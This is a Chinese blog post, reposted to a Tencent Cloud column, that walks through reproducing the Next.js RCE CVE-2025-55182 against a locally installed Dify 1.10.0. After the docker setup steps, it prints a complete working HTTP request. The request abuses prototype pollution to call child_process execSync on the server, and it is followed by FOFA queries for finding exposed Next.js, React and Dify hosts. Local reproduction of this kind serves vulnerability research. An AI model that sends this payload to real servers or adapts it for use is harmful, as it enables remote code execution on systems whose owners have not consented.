首页
学习
活动
专区
圈层
工具
发布
社区首页 >专栏 >Dify Next.js CVE-2025-55182 RCE漏洞本地复现详细版

Dify Next.js CVE-2025-55182 RCE漏洞本地复现详细版

作者头像
qife122
发布2025-12-24 13:56:48
发布2025-12-24 13:56:48
1.3K0
举报

一、安装dify(选定dify 1.10.0版本进行测试,最新版dify已修复,如有安装dify的童鞋建议更新到最新版)

  1. 选定dify版本1.10.0

dify github链接地址:https://github.com/langgenius/dify/tree/1.10.0

2.在本地系统中将dify 1.10.0项目git clone下来,具体命令如下

代码语言:javascript
复制
git clone -b 1.10.0 https://github.com/langgenius/dify.git
//我选择在虚拟机ubuntu系统中安装dify,所以我在ubuntu中git clone该项目
//项目比较大,如果下载比较慢的话,可能需要魔法,朋友们自己解决哈

3.下载后,如下所示

4.根据dify安装指令开始安装dify,这里默认docker环境已配置好哈,指令如下

代码语言:javascript
复制
cd dify
cd docker
cp .env.example .env
docker compose up -d

安装后,可以看到容器都已启动,如下所示

可以看到dify服务已起来

尝试在浏览器中访问dify试试,如下所示,访问正常,可以开始测试漏洞poc了

二、Next.js CVE-2025-55182 POC本地测试

1.配置burp代理,抓取dify请求包,如下所示

2.将/apps请求发送到Repeater,如下所示

3.构建poc进行测试,这里以获取当前用户信息的RCE测试,如下所示

poc:

代码语言:javascript
复制
POST /apps HTTP/1.1
Host: myservice.local
Next-Action: x
X-Nextjs-Request-Id: 91dmljym
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: hst51Myl5trXfvWsC9Ay6
Content-Length: 693

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('id').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

执行结果如下:

ps:fofa相关资产收集关键词

代码语言:javascript
复制
app="Next.js" && body="/_next/static/chunks/app/"
代码语言:javascript
复制
body="react.production.min.js" || body="React.createElement(" || app="React.js" || app="Dify"
本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2025-12-07,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 网络安全技术点滴分享 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档